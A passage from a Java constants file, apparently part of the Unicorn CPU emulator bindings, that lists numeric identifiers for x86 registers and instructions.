static final int UC_X86_REG_BX = 8; public static final int UC_X86_REG_CH = 9; public static final int UC_X86_REG_CL = 10; public static final int UC_X86_REG_CS = 11; public static final int UC_X86_REG_CX = 12; public static final int UC_X86_REG_DH = 13; public static final int UC_X86_REG_DI = 14; public static final int UC_X86_REG_DIL = 15; public static final int UC_X86_REG_DL = 16; public static final int UC_X86_REG_DS = 17; public static final int UC_X86_REG_DX = 18; public static final int UC_X86_REG_EAX = 19; public static final int UC_X86_REG_EBP = 20; public static final int UC_X86_REG_EBX = 21; public static final int UC_X86_REG_ECX = 22; public static final int UC_X86_REG_EDI = 23; public static final int UC_X86_REG_EDX = 24; public static final int UC_X86_REG_EFLAGS = 25; public static final int UC_X86_REG_EIP = 26; public static final int UC_X86_REG_ES = 28; public static final int UC_X86_REG_ESI = 29; public static final int UC_X86_REG_ESP = 30; public static final int UC_X86_REG_FPSW = 31; public static final int UC_X86_REG_FS = 32; public static final int UC_X86_REG_GS = 33; public static final int UC_X86_REG_IP = 34; public static final int UC_X86_REG_RAX = 35; public static final int UC_X86_REG_RBP = 36; public static final int UC_X86_REG_RBX = 37; public static final int UC_X86_REG_RCX = 38; public static final int UC_X86_REG_RDI = 39; public static final int UC_X86_REG_RDX = 40; public static final int UC_X86_REG_RIP = 41; public static final int UC_X86_REG_RSI = 43; public static final int UC_X86_REG_RSP = 44; public static final int UC_X86_REG_SI = 45; public static final int UC_X86_REG_SIL = 46; public static final int UC_X86_REG_SP = 47; public static final int UC_X86_REG_SPL = 48; public static final int UC_X86_REG_SS = 49; public static final int UC_X86_REG_CR0 = 50; public static final int UC_X86_REG_CR1 = 51; public static final int UC_X86_REG_CR2 = 52; public static final int UC_X86_REG_CR3 = 53; public static final int UC_X86_REG_CR4 = 54; public static final int UC_X86_REG_CR8 = 58; public static final int UC_X86_REG_DR0 = 66; public static final int UC_X86_REG_DR1 = 67; public static final int UC_X86_REG_DR2 = 68; public static final int UC_X86_REG_DR3 = 69; public static final int UC_X86_REG_DR4 = 70; public static final int UC_X86_REG_DR5 = 71; public static final int UC_X86_REG_DR6 = 72; public static final int UC_X86_REG_DR7 = 73; public static final int UC_X86_REG_FP0 = 82; public static final int UC_X86_REG_FP1 = 83; public static final int UC_X86_REG_FP2 = 84; public static final int UC_X86_REG_FP3 = 85; public static final int UC_X86_REG_FP4 = 86; public static final int UC_X86_REG_FP5 = 87; public static final int UC_X86_REG_FP6 = 88; public static final int UC_X86_REG_FP7 = 89; public static final int UC_X86_REG_K0 = 90; public static final int UC_X86_REG_K1 = 91; public static final int UC_X86_REG_K2 = 92; public static final int UC_X86_REG_K3 = 93; public static final int UC_X86_REG_K4 = 94; public static final int UC_X86_REG_K5 = 95; public static final int UC_X86_REG_K6 = 96; public static final int UC_X86_REG_K7 = 97; public static final int UC_X86_REG_MM0 = 98; public static final int UC_X86_REG_MM1 = 99; public static final int UC_X86_REG_MM2 = 100; public static final int UC_X86_REG_MM3 = 101; public static final int UC_X86_REG_MM4 = 102; public static final int UC_X86_REG_MM5 = 103; public static final int UC_X86_REG_MM6 = 104; public static final int UC_X86_REG_MM7 = 105; public static final int UC_X86_REG_R8 = 106; public static final int UC_X86_REG_R9 = 107; public static final int UC_X86_REG_R10 = 108; public static final int UC_X86_REG_R11 = 109; public static final int UC_X86_REG_R12 = 110; public static final int UC_X86_REG_R13 = 111; public static final int UC_X86_REG_R14 = 112; public static final int UC_X86_REG_R15 = 113; public static final int UC_X86_REG_ST0 = 114; public static final int UC_X86_REG_ST1 = 115; public static final int UC_X86_REG_ST2 = 116; public static final int UC_X86_REG_ST3 = 117; public static final int UC_X86_REG_ST4 = 118; public static final int UC_X86_REG_ST5 = 119; public static final int UC_X86_REG_ST6 = 120; public static final int UC_X86_REG_ST7 = 121; public static final int UC_X86_REG_XMM0 = 122; public static final int UC_X86_REG_XMM1 = 123; public static final int UC_X86_REG_XMM2 = 124; public static final int UC_X86_REG_XMM3 = 125; public static final int UC_X86_REG_XMM4 = 126; public static final int UC_X86_REG_XMM5 = 127; public static final int UC_X86_REG_XMM6 = 128; public static final int UC_X86_REG_XMM7 = 129; public static final int UC_X86_REG_XMM8 = 130; public static final int UC_X86_REG_XMM9 = 131; public static final int UC_X86_REG_XMM10 = 132; public static final int UC_X86_REG_XMM11 = 133; public static final int UC_X86_REG_XMM12 = 134; public static final int UC_X86_REG_XMM13 = 135; public static final int UC_X86_REG_XMM14 = 136; public static final int UC_X86_REG_XMM15 = 137; public static final int UC_X86_REG_XMM16 = 138; public static final int UC_X86_REG_XMM17 = 139; public static final int UC_X86_REG_XMM18 = 140; public static final int UC_X86_REG_XMM19 = 141; public static final int UC_X86_REG_XMM20 = 142; public static final int UC_X86_REG_XMM21 = 143; public static final int UC_X86_REG_XMM22 = 144; public static final int UC_X86_REG_XMM23 = 145; public static final int UC_X86_REG_XMM24 = 146; public static final int UC_X86_REG_XMM25 = 147; public static final int UC_X86_REG_XMM26 = 148; public static final int UC_X86_REG_XMM27 = 149; public static final int UC_X86_REG_XMM28 = 150; public static final int UC_X86_REG_XMM29 = 151; public static final int UC_X86_REG_XMM30 = 152; public static final int UC_X86_REG_XMM31 = 153; public static final int UC_X86_REG_YMM0 = 154; public static final int UC_X86_REG_YMM1 = 155; public static final int UC_X86_REG_YMM2 = 156; public static final int UC_X86_REG_YMM3 = 157; public static final int UC_X86_REG_YMM4 = 158; public static final int UC_X86_REG_YMM5 = 159; public static final int UC_X86_REG_YMM6 = 160; public static final int UC_X86_REG_YMM7 = 161; public static final int UC_X86_REG_YMM8 = 162; public static final int UC_X86_REG_YMM9 = 163; public static final int UC_X86_REG_YMM10 = 164; public static final int UC_X86_REG_YMM11 = 165; public static final int UC_X86_REG_YMM12 = 166; public static final int UC_X86_REG_YMM13 = 167; public static final int UC_X86_REG_YMM14 = 168; public static final int UC_X86_REG_YMM15 = 169; public static final int UC_X86_REG_YMM16 = 170; public static final int UC_X86_REG_YMM17 = 171; public static final int UC_X86_REG_YMM18 = 172; public static final int UC_X86_REG_YMM19 = 173; public static final int UC_X86_REG_YMM20 = 174; public static final int UC_X86_REG_YMM21 = 175; public static final int UC_X86_REG_YMM22 = 176; public static final int UC_X86_REG_YMM23 = 177; public static final int UC_X86_REG_YMM24 = 178; public static final int UC_X86_REG_YMM25 = 179; public static final int UC_X86_REG_YMM26 = 180; public static final int UC_X86_REG_YMM27 = 181; public static final int UC_X86_REG_YMM28 = 182; public static final int UC_X86_REG_YMM29 = 183; public static final int UC_X86_REG_YMM30 = 184; public static final int UC_X86_REG_YMM31 = 185; public static final int UC_X86_REG_ZMM0 = 186; public static final int UC_X86_REG_ZMM1 = 187; public static final int UC_X86_REG_ZMM2 = 188; public static final int UC_X86_REG_ZMM3 = 189; public static final int UC_X86_REG_ZMM4 = 190; public static final int UC_X86_REG_ZMM5 = 191; public static final int UC_X86_REG_ZMM6 = 192; public static final int UC_X86_REG_ZMM7 = 193; public static final int UC_X86_REG_ZMM8 = 194; public static final int UC_X86_REG_ZMM9 = 195; public static final int UC_X86_REG_ZMM10 = 196; public static final int UC_X86_REG_ZMM11 = 197; public static final int UC_X86_REG_ZMM12 = 198; public static final int UC_X86_REG_ZMM13 = 199; public static final int UC_X86_REG_ZMM14 = 200; public static final int UC_X86_REG_ZMM15 = 201; public static final int UC_X86_REG_ZMM16 = 202; public static final int UC_X86_REG_ZMM17 = 203; public static final int UC_X86_REG_ZMM18 = 204; public static final int UC_X86_REG_ZMM19 = 205; public static final int UC_X86_REG_ZMM20 = 206; public static final int UC_X86_REG_ZMM21 = 207; public static final int UC_X86_REG_ZMM22 = 208; public static final int UC_X86_REG_ZMM23 = 209; public static final int UC_X86_REG_ZMM24 = 210; public static final int UC_X86_REG_ZMM25 = 211; public static final int UC_X86_REG_ZMM26 = 212; public static final int UC_X86_REG_ZMM27 = 213; public static final int UC_X86_REG_ZMM28 = 214; public static final int UC_X86_REG_ZMM29 = 215; public static final int UC_X86_REG_ZMM30 = 216; public static final int UC_X86_REG_ZMM31 = 217; public static final int UC_X86_REG_R8B = 218; public static final int UC_X86_REG_R9B = 219; public static final int UC_X86_REG_R10B = 220; public static final int UC_X86_REG_R11B = 221; public static final int UC_X86_REG_R12B = 222; public static final int UC_X86_REG_R13B = 223; public static final int UC_X86_REG_R14B = 224; public static final int UC_X86_REG_R15B = 225; public static final int UC_X86_REG_R8D = 226; public static final int UC_X86_REG_R9D = 227; public static final int UC_X86_REG_R10D = 228; public static final int UC_X86_REG_R11D = 229; public static final int UC_X86_REG_R12D = 230; public static final int UC_X86_REG_R13D = 231; public static final int UC_X86_REG_R14D = 232; public static final int UC_X86_REG_R15D = 233; public static final int UC_X86_REG_R8W = 234; public static final int UC_X86_REG_R9W = 235; public static final int UC_X86_REG_R10W = 236; public static final int UC_X86_REG_R11W = 237; public static final int UC_X86_REG_R12W = 238; public static final int UC_X86_REG_R13W = 239; public static final int UC_X86_REG_R14W = 240; public static final int UC_X86_REG_R15W = 241; public static final int UC_X86_REG_IDTR = 242; public static final int UC_X86_REG_GDTR = 243; public static final int UC_X86_REG_LDTR = 244; public static final int UC_X86_REG_TR = 245; public static final int UC_X86_REG_FPCW = 246; public static final int UC_X86_REG_FPTAG = 247; public static final int UC_X86_REG_MSR = 248; public static final int UC_X86_REG_MXCSR = 249; public static final int UC_X86_REG_FS_BASE = 250; public static final int UC_X86_REG_GS_BASE = 251; public static final int UC_X86_REG_FLAGS = 252; public static final int UC_X86_REG_RFLAGS = 253; public static final int UC_X86_REG_FIP = 254; public static final int UC_X86_REG_FCS = 255; public static final int UC_X86_REG_FDP = 256; public static final int UC_X86_REG_FDS = 257; public static final int UC_X86_REG_FOP = 258; public static final int UC_X86_REG_ENDING = 259; // X86 instructions public static final int UC_X86_INS_INVALID = 0; public static final int UC_X86_INS_AAA = 1; public static final int UC_X86_INS_AAD = 2; public static final int UC_X86_INS_AAM = 3; public static final int UC_X86_INS_AAS = 4; public static final int UC_X86_INS_FABS = 5; public static final int UC_X86_INS_ADC = 6; public static final int UC_X86_INS_ADCX = 7; public static final int UC_X86_INS_ADD = 8; public static final int UC_X86_INS_ADDPD = 9; public static final int UC_X86_INS_ADDPS = 10; public static final int UC_X86_INS_ADDSD = 11; public static final int UC_X86_INS_ADDSS = 12; public static final int UC_X86_INS_ADDSUBPD = 13; public static final int UC_X86_INS_ADDSUBPS = 14; public static final int UC_X86_INS_FADD = 15; public static final int UC_X86_INS_FIADD = 16; public static final int UC_X86_INS_FADDP = 17; public static final int UC_X86_INS_ADOX = 18; public static final int UC_X86_INS_AESDECLAST = 19; public static final int UC_X86_INS_AESDEC = 20; public static final int UC_X86_INS_AESENCLAST = 21; public static final int UC_X86_INS_AESENC = 22; public static final int UC_X86_INS_AESIMC = 23; public static final int UC_X86_INS_AESKEYGENASSIST = 24; public static final int UC_X86_INS_AND = 25; public static final int UC_X86_INS_ANDN = 26; public static final int UC_X86_INS_ANDNPD = 27; public static final int UC_X86_INS_ANDNPS = 28; public static final int UC_X86_INS_ANDPD = 29; public static final int UC_X86_INS_ANDPS = 30; public static final int UC_X86_INS_ARPL = 31; public static final int UC_X86_INS_BEXTR = 32; public static final int UC_X86_INS_BLCFILL = 33; public static final int UC_X86_INS_BLCI = 34; public static final int UC_X86_INS_BLCIC = 35; public static final int UC_X86_INS_BLCMSK = 36; public static final int UC_X86_INS_BLCS = 37; public static final int UC_X86_INS_BLENDPD = 38; public static final int UC_X86_INS_BLENDPS = 39; public static final int UC_X86_INS_BLENDVPD = 40; public static final int UC_X86_INS_BLENDVPS = 41; public static final int UC_X86_INS_BLSFILL = 42; public static final int UC_X86_INS_BLSI = 43; public static final int UC_X86_INS_BLSIC = 44; public static final int UC_X86_INS_BLSMSK = 45; public static final int UC_X86_INS_BLSR = 46; public static final int UC_X86_INS_BOUND = 47; public static final int UC_X86_INS_BSF = 48; public static final int UC_X86_INS_BSR = 49; public static final int UC_X86_INS_BSWAP = 50; public static final int UC_X86_INS_BT = 51; public static final int UC_X86_INS_BTC = 52; public static final int UC_X86_INS_BTR = 53; public static final int UC_X86_INS_BTS = 54; public static final int UC_X86_INS_BZHI = 55; public static final int UC_X86_INS_CALL = 56; public static final int UC_X86_INS_CBW = 57; public static final int UC_X86_INS_CDQ = 58; public static final int UC_X86_INS_CDQE = 59; public static final int UC_X86_INS_FCHS = 60; public static final int UC_X86_INS_CLAC = 61; public static final int UC_X86_INS_CLC = 62; public static final int UC_X86_INS_CLD = 63; public static final int UC_X86_INS_CLFLUSH = 64; public static final int UC_X86_INS_CLFLUSHOPT = 65; public static final int UC_X86_INS_CLGI = 66; public static final int UC_X86_INS_CLI = 67; public static final int UC_X86_INS_CLTS = 68; public static final int UC_X86_INS_CLWB = 69; public static final int UC_X86_INS_CMC = 70; public static final int UC_X86_INS_CMOVA = 71; public static final int UC_X86_INS_CMOVAE = 72; public static final int UC_X86_INS_CMOVB = 73; public static final int UC_X86_INS_CMOVBE = 74; public static final int UC_X86_INS_FCMOVBE = 75; public static final int UC_X86_INS_FCMOVB = 76; public static final int UC_X86_INS_CMOVE = 77; public static final int UC_X86_INS_FCMOVE = 78; public static final int UC_X86_INS_CMOVG = 79; public static final int UC_X86_INS_CMOVGE = 80; public static final int UC_X86_INS_CMOVL = 81; public static final int UC_X86_INS_CMOVLE = 82; public static final int UC_X86_INS_FCMOVNBE = 83; public static final int UC_X86_INS_FCMOVNB = 84; public static final int UC_X86_INS_CMOVNE = 85; public static final int UC_X86_INS_FCMOVNE = 86; public static final int UC_X86_INS_CMOVNO = 87; public static final int UC_X86_INS_CMOVNP = 88; public static final int UC_X86_INS_FCMOVNU = 89; public static final int UC_X86_INS_CMOVNS = 90; public static final int UC_X86_INS_CMOVO = 91; public static final int UC_X86_INS_CMOVP = 92; public static final int UC_X86_INS_FCMOVU = 93; public static final int UC_X86_INS_CMOVS = 94; public static final int UC_X86_INS_CMP = 95; public static final int UC_X86_INS_CMPPD = 96; public static final int UC_X86_INS_CMPPS = 97; public static final int UC_X86_INS_CMPSB = 98; public static final int UC_X86_INS_CMPSD = 99; public static final int UC_X86_INS_CMPSQ = 100; public static final int UC_X86_INS_CMPSS = 101; public static final int UC_X86_INS_CMPSW = 102; public static final int UC_X86_INS_CMPXCHG16B = 103; public static final int UC_X86_INS_CMPXCHG = 104; public static final int UC_X86_INS_CMPXCHG8B = 105; public static final int UC_X86_INS_COMISD = 106; public static final int UC_X86_INS_COMISS = 107; public static final int UC_X86_INS_FCOMP = 108; public static final int UC_X86_INS_FCOMPI = 109; public static final int UC_X86_INS_FCOMI = 110; public static final int UC_X86_INS_FCOM = 111; public static final int UC_X86_INS_FCOS = 112; public static final int UC_X86_INS_CPUID = 113; public static final int UC_X86_INS_CQO = 114; public static final int UC_X86_INS_CRC32 = 115; public static final int UC_X86_INS_CVTDQ2PD = 116; public static final int UC_X86_INS_CVTDQ2PS = 117; public static final int UC_X86_INS_CVTPD2DQ = 118; public static final int UC_X86_INS_CVTPD2PS = 119; public static final int UC_X86_INS_CVTPS2DQ = 120; public static final int UC_X86_INS_CVTPS2PD = 121; public static final int UC_X86_INS_CVTSD2SI = 122; public static final int UC_X86_INS_CVTSD2SS = 123; public static final int UC_X86_INS_CVTSI2SD = 124; public static final int UC_X86_INS_CVTSI2SS = 125; public static final int UC_X86_INS_CVTSS2SD = 126; public static final int UC_X86_INS_CVTSS2SI = 127; public static final int UC_X86_INS_CVTTPD2DQ = 128; public static final int UC_X86_INS_CVTTPS2DQ = 129; public static final int UC_X86_INS_CVTTSD2SI = 130; public static final int UC_X86_INS_CVTTSS2SI = 131; public static final int UC_X86_INS_CWD = 132; public static final int UC_X86_INS_CWDE = 133; public static final int UC_X86_INS_DAA = 134; public static final int UC_X86_INS_DAS = 135; public static final int UC_X86_INS_DATA16 = 136; public static final int UC_X86_INS_DEC = 137; public static final int UC_X86_INS_DIV = 138; public static final int UC_X86_INS_DIVPD = 139; public static final int UC_X86_INS_DIVPS = 140; public static final int UC_X86_INS_FDIVR = 141; public static final int UC_X86_INS_FIDIVR = 142; public static final int UC_X86_INS_FDIVRP = 143; public static final int UC_X86_INS_DIVSD = 144; public static final int UC_X86_INS_DIVSS = 145; public static final int UC_X86_INS_FDIV = 146; public static final int UC_X86_INS_FIDIV = 147; public static final int UC_X86_INS_FDIVP = 148; public static final int UC_X86_INS_DPPD = 149; public static final int UC_X86_INS_DPPS = 150; public static final int UC_X86_INS_RET = 151; public static final int UC_X86_INS_ENCLS = 152; public static final int UC_X86_INS_ENCLU = 153; public static final int UC_X86_INS_ENTER = 154; public static final int UC_X86_INS_EXTRACTPS = 155; public static final int UC_X86_INS_EXTRQ = 156; public static final int UC_X86_INS_F2XM1 = 157; public static final int UC_X86_INS_LCALL = 158; public static final int UC_X86_INS_LJMP = 159; public static final int UC_X86_INS_FBLD = 160; public static final int UC_X86_INS_FBSTP = 161; public static final int UC_X86_INS_FCOMPP = 162; public static final int UC_X86_INS_FDECSTP = 163; public static final int UC_X86_INS_FEMMS = 164; public static final int UC_X86_INS_FFREE = 165; public static final int UC_X86_INS_FICOM = 166; public static final int UC_X86_INS_FICOMP = 167; public static final int UC_X86_INS_FINCSTP = 168; public static final int UC_X86_INS_FLDCW = 169; public static final int UC_X86_INS_FLDENV = 170; public static final int UC_X86_INS_FLDL2E = 171; public static final int UC_X86_INS_FLDL2T = 172; public static final int UC_X86_INS_FLDLG2 = 173; public static final int UC_X86_INS_FLDLN2 = 174; public static final int UC_X86_INS_FLDPI = 175; public static final int UC_X86_INS_FNCLEX = 176; public static final int UC_X86_INS_FNINIT = 177; public static final int UC_X86_INS_FNOP = 178; public static final int UC_X86_INS_FNSTCW = 179; public static final int UC_X86_INS_FNSTSW = 180; public static final int UC_X86_INS_FPATAN = 181; public static final int UC_X86_INS_FPREM = 182; public static final int UC_X86_INS_FPREM1 = 183; public static final int UC_X86_INS_FPTAN = 184; public static final int UC_X86_INS_FFREEP = 185; public static final int UC_X86_INS_FRNDINT = 186; public static final int UC_X86_INS_FRSTOR = 187; public static final int UC_X86_INS_FNSAVE = 188; public static final int UC_X86_INS_FSCALE = 189; public static final int UC_X86_INS_FSETPM = 190; public static final int UC_X86_INS_FSINCOS = 191; public static final int UC_X86_INS_FNSTENV = 192; public static final int UC_X86_INS_FXAM = 193; public static final int UC_X86_INS_FXRSTOR = 194; public static final int UC_X86_INS_FXRSTOR64 = 195; public static final int UC_X86_INS_FXSAVE = 196; public static final int UC_X86_INS_FXSAVE64 = 197; public static final int UC_X86_INS_FXTRACT = 198; public static final int UC_X86_INS_FYL2X = 199; public static final int UC_X86_INS_FYL2XP1 = 200; public static final int UC_X86_INS_MOVAPD = 201; public static final int UC_X86_INS_MOVAPS = 202; public static final int UC_X86_INS_ORPD = 203; public static final int UC_X86_INS_ORPS = 204; public static final int UC_X86_INS_VMOVAPD = 205; public static final int UC_X86_INS_VMOVAPS = 206; public static final int UC_X86_INS_XORPD = 207; public static final int UC_X86_INS_XORPS = 208; public static final int UC_X86_INS_GETSEC = 209; public static final int UC_X86_INS_HADDPD = 210; public static final int UC_X86_INS_HADDPS = 211; public static final int UC_X86_INS_HLT = 212; public static final int UC_X86_INS_HSUBPD = 213; public static final int UC_X86_INS_HSUBPS = 214; public static final int UC_X86_INS_IDIV = 215; public static final int UC_X86_INS_FILD = 216; public static final int UC_X86_INS_IMUL = 217; public static final int UC_X86_INS_IN = 218; public static final int UC_X86_INS_INC = 219; public static final int UC_X86_INS_INSB = 220; public static final int UC_X86_INS_INSERTPS = 221; public static final int UC_X86_INS_INSERTQ = 222; public static final int UC_X86_INS_INSD = 223; public static final int UC_X86_INS_INSW = 224; public static final int UC_X86_INS_INT = 225; public static final int UC_X86_INS_INT1 = 226; public static final int UC_X86_INS_INT3 = 227; public static final int UC_X86_INS_INTO = 228; public static final int UC_X86_INS_INVD = 229; public static final int UC_X86_INS_INVEPT = 230; public static final int UC_X86_INS_INVLPG = 231; public static final int UC_X86_INS_INVLPGA = 232; public static final int UC_X86_INS_INVPCID = 233; public static final int UC_X86_INS_INVVPID = 234; public static final int UC_X86_INS_IRET = 235; public static final int UC_X86_INS_IRETD = 236; public static final int UC_X86_INS_IRETQ = 237; public static final int UC_X86_INS_FISTTP = 238; public static final int UC_X86_INS_FIST = 239; public static final int UC_X86_INS_FISTP = 240; public static final int UC_X86_INS_UCOMISD = 241; public static final int UC_X86_INS_UCOMISS = 242; public static final int UC_X86_INS_VCOMISD = 243; public static final int UC_X86_INS_VCOMISS = 244; public static final int UC_X86_INS_VCVTSD2SS = 245; public static final int UC_X86_INS_VCVTSI2SD = 246; public static final int UC_X86_INS_VCVTSI2SS = 247; public static final int UC_X86_INS_VCVTSS2SD = 248; public static final int UC_X86_INS_VCVTTSD2SI = 249; public static final int UC_X86_INS_VCVTTSD2USI = 250; public static final int UC_X86_INS_VCVTTSS2SI = 251; public static final int UC_X86_INS_VCVTTSS2USI = 252; public static final int UC_X86_INS_VCVTUSI2SD = 253; public static final int UC_X86_INS_VCVTUSI2SS = 254; public static final int UC_X86_INS_VUCOMISD = 255; public static final int UC_X86_INS_VUCOMISS = 256; public static final int UC_X86_INS_JAE = 257; public static final int UC_X86_INS_JA = 258; public static final int UC_X86_INS_JBE = 259; public static final int UC_X86_INS_JB = 260; public static final int UC_X86_INS_JCXZ = 261; public static final int UC_X86_INS_JECXZ = 262; public static final int UC_X86_INS_JE = 263; public static final int UC_X86_INS_JGE = 264; public static final int UC_X86_INS_JG = 265; public static final int UC_X86_INS_JLE = 266; public static final int UC_X86_INS_JL = 267; public static final int UC_X86_INS_JMP = 268; public static final int UC_X86_INS_JNE = 269; public static final int UC_X86_INS_JNO = 270; public static final int UC_X86_INS_JNP = 271; public static final int UC_X86_INS_JNS = 272; public static final int UC_X86_INS_JO = 273; public static final int UC_X86_INS_JP = 274; public static final int UC_X86_INS_JRCXZ = 275; public static final int UC_X86_INS_JS = 276; public static final int UC_X86_INS_KANDB = 277; public static final int UC_X86_INS_KANDD = 278; public static final int UC_X86_INS_KANDNB = 279; public static final int UC_X86_INS_KANDND = 280; public static final int UC_X86_INS_KANDNQ = 281; public static final int UC_X86_INS_KANDNW = 282; public static final int UC_X86_INS_KANDQ = 283; public static final int UC_X86_INS_KANDW = 284; public static final int UC_X86_INS_KMOVB = 285; public static final int UC_X86_INS_KMOVD = 286; public static final int UC_X86_INS_KMOVQ = 287; public static final int UC_X86_INS_KMOVW = 288; public static final int UC_X86_INS_KNOTB = 289; public static final int UC_X86_INS_KNOTD = 290; public static final int UC_X86_INS_KNOTQ = 291; public static final int UC_X86_INS_KNOTW = 292; public static final int UC_X86_INS_KORB = 293; public static final int UC_X86_INS_KORD = 294; public static final int UC_X86_INS_KORQ = 295; public static final int UC_X86_INS_KORTESTB = 296; public static final int UC_X86_INS_KORTESTD = 297; public static final int UC_X86_INS_KORTESTQ = 298; public static final int UC_X86_INS_KORTESTW = 299; public static final int UC_X86_INS_KORW = 300; public static final int UC_X86_INS_KSHIFTLB = 301; public static final int UC_X86_INS_KSHIFTLD = 302; public static final int UC_X86_INS_KSHIFTLQ = 303; public static final int UC_X86_INS_KSHIFTLW = 304; public static final int UC_X86_INS_KSHIFTRB = 305; public static final int UC_X86_INS_KSHIFTRD = 306; public static final int UC_X86_INS_KSHIFTRQ = 307; public static final int UC_X86_INS_KSHIFTRW = 308; public static final int UC_X86_INS_KUNPCKBW = 309; public static final int UC_X86_INS_KXNORB = 310; public static final int UC_X86_INS_KXNORD = 311; public static final int UC_X86_INS_KXNORQ = 312; public static final int UC_X86_INS_KXNORW = 313; public static final int UC_X86_INS_KXORB = 314; public static final int UC_X86_INS_KXORD = 315; public static final int UC_X86_INS_KXORQ = 316; public static final int UC_X86_INS_KXORW = 317; public static final int UC_X86_INS_LAHF = 318; public static final int UC_X86_INS_LAR = 319; public static final int UC_X86_INS_LDDQU = 320; public static final int UC_X86_INS_LDMXCSR = 321; public static final int UC_X86_INS_LDS = 322; public static final int UC_X86_INS_FLDZ = 323; public static final int UC_X86_INS_FLD1 = 324; public static final int UC_X86_INS_FLD = 325; public static final int UC_X86_INS_LEA = 326; public static final int UC_X86_INS_LEAVE = 327; public static final int UC_X86_INS_LES = 328; public static final int UC_X86_INS_LFENCE = 329; public static final int UC_X86_INS_LFS = 330; public static final int UC_X86_INS_LGDT = 331; public static final int UC_X86_INS_LGS = 332; public static final int UC_X86_INS_LIDT = 333; public static final int UC_X86_INS_LLDT = 334; public static final int UC_X86_INS_LMSW = 335; public static final int UC_X86_INS_OR = 336; public static final int UC_X86_INS_SUB = 337; public static final int UC_X86_INS_XOR = 338; public static final int UC_X86_INS_LODSB = 339; public static final int UC_X86_INS_LODSD = 340; public static final int UC_X86_INS_LODSQ = 341; public static final int UC_X86_INS_LODSW = 342; public static final int UC_X86_INS_LOOP = 343; public static final int UC_X86_INS_LOOPE = 344; public static final int UC_X86_INS_LOOPNE = 345; public static final int UC_X86_INS_RETF = 346; public static final int UC_X86_INS_RETFQ = 347; public static final int UC_X86_INS_LSL = 348; public static final int UC_X86_INS_LSS = 349; public static final int UC_X86_INS_LTR = 350; public static final int UC_X86_INS_XADD = 351; public static final int UC_X86_INS_LZCNT = 352; public static final int UC_X86_INS_MASKMOVDQU = 353; public static final int UC_X86_INS_MAXPD = 354; public static final int UC_X86_INS_MAXPS = 355; public static final int UC_X86_INS_MAXSD = 356; public static final int UC_X86_INS_MAXSS = 357; public static final int UC_X86_INS_MFENCE = 358; public static final int UC_X86_INS_MINPD = 359; public static final int UC_X86_INS_MINPS = 360; public static final int UC_X86_INS_MINSD = 361; public static final int UC_X86_INS_MINSS = 362; public static final int UC_X86_INS_CVTPD2PI = 363; public static final int UC_X86_INS_CVTPI2PD = 364; public static final int UC_X86_INS_CVTPI2PS = 365; public static final int UC_X86_INS_CVTPS2PI = 366; public static final int UC_X86_INS_CVTTPD2PI = 367; public static final int UC_X86_INS_CVTTPS2PI = 368; public static final int UC_X86_INS_EMMS = 369; public static final int UC_X86_INS_MASKMOVQ = 370; public static final int UC_X86_INS_MOVD = 371; public static final int UC_X86_INS_MOVDQ2Q = 372; public static final int UC_X86_INS_MOVNTQ = 373; public static final int UC_X86_INS_MOVQ2DQ = 374; public static final int UC_X86_INS_MOVQ = 375; public static final int UC_X86_INS_PABSB = 376; public static final int UC_X86_INS_PABSD = 377; public static final int UC_X86_INS_PABSW = 378; public static final int UC_X86_INS_PACKSSDW = 379; public static final int UC_X86_INS_PACKSSWB = 380; public static final int UC_X86_INS_PACKUSWB = 381; public static final int UC_X86_INS_PADDB = 382; public static final int UC_X86_INS_PADDD = 383; public static final int UC_X86_INS_PADDQ = 384; public static final int UC_X86_INS_PADDSB = 385; public static final int UC_X86_INS_PADDSW = 386; public static final int UC_X86_INS_PADDUSB = 387; public static final int UC_X86_INS_PADDUSW = 388; public static final int UC_X86_INS_PADDW = 389; public static final int UC_X86_INS_PALIGNR = 390; public static final int UC_X86_INS_PANDN = 391; public static final int UC_X86_INS_PAND = 392; public static final int UC_X86_INS_PAVGB = 393; public static final int UC_X86_INS_PAVGW = 394; public static final int UC_X86_INS_PCMPEQB = 395; public static final int UC_X86_INS_PCMPEQD = 396; public static final int UC_X86_INS_PCMPEQW = 397; public static final int UC_X86_INS_PCMPGTB = 398; public static final int UC_X86_INS_PCMPGTD = 399; public static final int UC_X86_INS_PCMPGTW = 400; public static final int UC_X86_INS_PEXTRW = 401; public static final int UC_X86_INS_PHADDSW = 402; public static final int UC_X86_INS_PHADDW = 403; public static final int UC_X86_INS_PHADDD = 404; public static final int UC_X86_INS_PHSUBD = 405; public static final int UC_X86_INS_PHSUBSW = 406; public static final int UC_X86_INS_PHSUBW = 407; public static final int UC_X86_INS_PINSRW = 408; public static final int UC_X86_INS_PMADDUBSW = 409; public static final int UC_X86_INS_PMADDWD = 410; public static final int UC_X86_INS_PMAXSW = 411; public static final int UC_X86_INS_PMAXUB = 412; public static final int UC_X86_INS_PMINSW = 413; public static final int UC_X86_INS_PMINUB = 414; public static final int UC_X86_INS_PMOVMSKB = 415; public static final int UC_X86_INS_PMULHRSW = 416; public static final int UC_X86_INS_PMULHUW = 417; public static final int UC_X86_INS_PMULHW = 418; public static final int UC_X86_INS_PMULLW = 419; public static final int UC_X86_INS_PMULUDQ = 420; public static final int UC_X86_INS_POR = 421; public static final int UC_X86_INS_PSADBW = 422; public static final int UC_X86_INS_PSHUFB = 423; public static final int UC_X86_INS_PSHUFW = 424; public static final int UC_X86_INS_PSIGNB = 425; public static final int UC_X86_INS_PSIGND = 426; public static final int UC_X86_INS_PSIGNW = 427; public static final int UC_X86_INS_PSLLD = 428; public static final int UC_X86_INS_PSLLQ = 429; public static final int UC_X86_INS_PSLLW = 430; public static final int UC_X86_INS_PSRAD = 431; public static final int UC_X86_INS_PSRAW = 432; public static final int UC_X86_INS_PSRLD = 433; public static final int UC_X86_INS_PSRLQ = 434; public static final int UC_X86_INS_PSRLW = 435; public static final int UC_X86_INS_PSUBB = 436; public static final int UC_X86_INS_PSUBD = 437; public static final int UC_X86_INS_PSUBQ = 438; public static final int UC_X86_INS_PSUBSB = 439; public static final int UC_X86_INS_PSUBSW = 440; public static final int UC_X86_INS_PSUBUSB = 441; public static final int UC_X86_INS_PSUBUSW = 442; public static final int UC_X86_INS_PSUBW = 443; public static final int UC_X86_INS_PUNPCKHBW = 444; public static final int UC_X86_INS_PUNPCKHDQ = 445; public static final int UC_X86_INS_PUNPCKHWD = 446; public static final int UC_X86_INS_PUNPCKLBW = 447; public static final int UC_X86_INS_PUNPCKLDQ = 448; public static final int UC_X86_INS_PUNPCKLWD = 449; public static final int UC_X86_INS_PXOR = 450; public static final int UC_X86_INS_MONITOR = 451; public static final int 